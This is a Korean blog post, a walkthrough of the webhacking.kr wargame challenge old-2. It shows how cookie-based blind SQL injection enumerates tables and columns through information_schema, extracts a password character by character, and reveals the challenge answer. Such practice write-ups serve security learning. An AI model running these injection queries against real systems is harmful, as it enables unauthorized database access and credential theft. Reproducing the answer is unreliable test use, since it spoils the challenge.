ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [webhacking.kr] Challenge(old) 2
    Security/web 2021. 7. 28. 02:38
    728x90

    문제 분석

    접속

    https://webhacking.kr/challenge/web-02/

     

    https://webhacking.kr/challenge/web-02/admin.php

     

    webhacking.kr

    개발자 도구

     

    접속

    https://webhacking.kr/challenge/web-02/admin.php

     

    sql injection??

    time

    쿠키 값을 바꾸어보았다.

    time : 1

    time : 1=1

    time : 1=2

    blind sql injection을 하면 되겠다.

     


    blind sql injection

    1. table 갯수

    select count(table_name) from information_schema.tables where table_schema=database()

    2

    information_schema는 서버 내에 존재하는 DB의 메타정보(테이블 칼럼, 인덱스)를 모아둔 DB다.

     

    2. table name 길이

    select length(table_name) from information_schema.tables where table_schema=database() limit 0,1

    첫 번째 테이블의 이름의 길이 : 13

    select length(table_name) from information_schema.tables where table_schema=database() limit 1,1

    두 번째 테이블의 이름의 길이 : 3

     

    3. table name

    select ascii(substr(table_name, 1, 1)) from information_schema.tables
    where table_schema=database() limit 0, 1

    첫 번째 테이블 : 97, 100, 109, 105, 110, 95, 97, 114, 101, 97, 95, 112, 119
    두 번째 테이블 : 108, 111, 103

    글자로 변환하면

    admin_area_pw

    log

    4. admin_area_pw column 갯수

    select count(column_name) from information_schema.columns where table_name="admin_area_pw"

    1

     

    5. column name 길이

    select length(column_name) from information_schema.columns where table_name="admin_area_pw"

    2

     

    6. column name

    select ascii(substr(column_name, 1, 1)) from information_schema.columns where table_name="admin_area_pw"
    select ascii(substr(column_name, 2, 1) from information_schema.columns where table_name="admin_area_pw"

    pw

     

    7. pw 길이

    select length(pw) from admin_area_pw

    17

     

    8. pw

    select ascii(substr(pw, 1, 1)) from admin_area_pw
    select ascii(substr(pw, 2, 1)) from admin_area_pw
    select ascii(substr(pw, 3, 1)) from admin_area_pw

    ...

    select ascii(substr(pw, 17, 1)) from admin_area_pw

    kudos_to_beistlab

    728x90

    'Security > web' 카테고리의 다른 글

    [webhacking.kr] old-23 blind SQL injection  (0) 2021.08.18
    [webhacking.kr] Challenge(old) 4  (0) 2021.07.31
    [webhacking.kr] Challenge(old) 33  (0) 2021.07.31

    댓글

Designed by Tistory.